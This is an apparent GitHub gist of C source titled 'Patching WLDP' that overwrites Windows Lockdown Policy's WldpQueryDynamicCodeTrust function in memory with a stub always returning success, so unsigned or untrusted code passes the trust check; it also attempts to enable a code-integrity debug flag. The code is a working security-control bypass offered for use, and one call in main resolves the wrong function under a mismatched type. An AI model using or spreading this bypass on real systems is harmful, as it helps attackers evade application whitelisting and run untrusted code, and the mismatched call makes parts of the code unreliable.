Skip to content

Instantly share code, notes, and snippets.

@odzhan
Last active October 1, 2024 04:09
Show Gist options
  • Save odzhan/9d249047cb89c716c64068c29e5be0b3 to your computer and use it in GitHub Desktop.
Save odzhan/9d249047cb89c716c64068c29e5be0b3 to your computer and use it in GitHub Desktop.
Patching WLDP
/**
BSD 3-Clause License
Copyright (c) 2019 Odzhan. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <windows.h>
#include <wldp.h>
#include <stdio.h>
typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)(
PBOOL isEnabled);
typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)(
HANDLE fileHandle,
PVOID baseImage,
ULONG ImageSize);
// fake function that always returns S_OK
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
HANDLE fileHandle,
PVOID baseImage,
ULONG ImageSize)
{
return S_OK;
}
static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}
static BOOL PatchWldp(VOID) {
BOOL patched = FALSE;
HMODULE wldp;
DWORD len, op, t;
LPVOID cs;
// load wldp
wldp = LoadLibrary("wldp");
if(wldp != NULL) {
// resolve address of function to patch
cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
if(cs != NULL) {
// calculate length of stub
len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
(ULONG_PTR)WldpQueryDynamicCodeTrustStub;
// make the memory writeable
if(VirtualProtect(
cs, len, PAGE_EXECUTE_READWRITE, &op))
{
// over write with stub
memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
patched = TRUE;
// set back to original protection
VirtualProtect(cs, len, op, &t);
}
}
}
return patched;
}
BOOL VerifyCodeTrust(const char *path) {
WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust;
HMODULE wldp;
HANDLE file, map, mem;
HRESULT hr = -1;
DWORD low, high;
// load wldp
wldp = LoadLibrary("wldp");
_WldpQueryDynamicCodeTrust =
(WldpQueryDynamicCodeTrust_t)
GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
// return FALSE on failure
if(_WldpQueryDynamicCodeTrust == NULL) {
printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
return FALSE;
}
// open file reading
file = CreateFile(
path, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if(file != INVALID_HANDLE_VALUE) {
// get size
low = GetFileSize(file, &high);
if(low != 0) {
// create mapping
map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
if(map != NULL) {
// get pointer to memory
mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
if(mem != NULL) {
// verify signature
hr = _WldpQueryDynamicCodeTrust(0, mem, low);
UnmapViewOfFile(mem);
}
CloseHandle(map);
}
}
CloseHandle(file);
}
return hr == S_OK;
}
#include "C:\ntlib\ntddk.h"
#define SystemCodeIntegrityInformation 0x67
#define CODEINTEGRITY_OPTION_ENABLED 0x0001
#define CODEINTEGRITY_OPTION_TESTSIGN 0x0002
#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x0004
#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x0008
#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x0010
#define CODEINTEGRITY_OPTION_TEST_BUILD 0x0020
#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x0040
#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x0080
#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x0100
#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x0200
#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x0400
#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x0800
#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
typedef struct _ci_opt {
ULONG ulOption;
PCHAR szOption;
} ci_opt;
ci_opt options[]={
{CODEINTEGRITY_OPTION_ENABLED,"CODEINTEGRITY_OPTION_ENABLED"},
{CODEINTEGRITY_OPTION_TESTSIGN,"CODEINTEGRITY_OPTION_TESTSIGN"},
{CODEINTEGRITY_OPTION_UMCI_ENABLED,"CODEINTEGRITY_OPTION_UMCI_ENABLED"},
{CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED"},
{CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED,"CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED"},
{CODEINTEGRITY_OPTION_TEST_BUILD,"CODEINTEGRITY_OPTION_TEST_BUILD"},
{CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD,"CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD"},
{CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED,"CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED"},
{CODEINTEGRITY_OPTION_FLIGHT_BUILD,"CODEINTEGRITY_OPTION_FLIGHT_BUILD"},
{CODEINTEGRITY_OPTION_FLIGHTING_ENABLED,"CODEINTEGRITY_OPTION_FLIGHTING_ENABLED"},
{CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED"},
{CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED"},
{CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED"},
{CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED,"CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED"},
{0, NULL}
};
typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
ULONG Length;
ULONG CodeIntegrityOptions;
} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
VOID ListCIOptions(VOID) {
NTSTATUS status;
SYSTEM_CODEINTEGRITY_INFORMATION scii;
DWORD i, len;
scii.Length = sizeof(scii);
status = NtQuerySystemInformation(
SystemCodeIntegrityInformation,
&scii, sizeof(scii), &len);
if(NT_SUCCESS(status)) {
printf("\nCode Integrity Options.\n\n");
for(i=0;options[i].ulOption != 0; i++) {
if(scii.CodeIntegrityOptions & options[i].ulOption) {
printf("%s\n", options[i].szOption);
}
}
}
}
// Trying to set the code integrity options will return STATUS_INVALID_INFO_CLASS
BOOL EnableCIOption(ULONG Option) {
NTSTATUS status;
SYSTEM_CODEINTEGRITY_INFORMATION scii;
DWORD i, len;
scii.Length = sizeof(scii);
status = NtQuerySystemInformation(
SystemCodeIntegrityInformation,
&scii, sizeof(scii), &len);
if(NT_SUCCESS(status)) {
scii.CodeIntegrityOptions |= CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED;
status = NtSetSystemInformation(
SystemCodeIntegrityInformation,
&scii, sizeof(scii), &len);
printf("status is %08lx\n", status);
}
return NT_SUCCESS(status);
}
int main(int argc, char *argv[]) {
int i;
WldpIsDynamicCodePolicyEnabled_t WldpIsDynamicCodePolicyEnabled;
BOOL enabled;
EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED);
ListCIOptions();
WldpIsDynamicCodePolicyEnabled =
(WldpIsDynamicCodePolicyEnabled_t)
GetProcAddress(LoadLibrary("wldp"), "WldpQueryDynamicCodeTrust");
if(WldpIsDynamicCodePolicyEnabled == NULL) {
printf("unable to load Wldp.\n");
}
WldpIsDynamicCodePolicyEnabled(&enabled);
printf("Wldp Code Policy is %s.\n",
enabled ? "enabled" : "disabled");
if(!PatchWldp()) {
printf("unable to patch Wldp.\n");
return 0;
}
for(i=1; i<argc; i++) {
// skip directories
if(GetFileAttributes(argv[i]) & FILE_ATTRIBUTE_DIRECTORY) continue;
// verify file
printf("%-8s : %s\n",
VerifyCodeTrust(argv[i]) ? "OK" : "FAILED",
argv[i]);
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment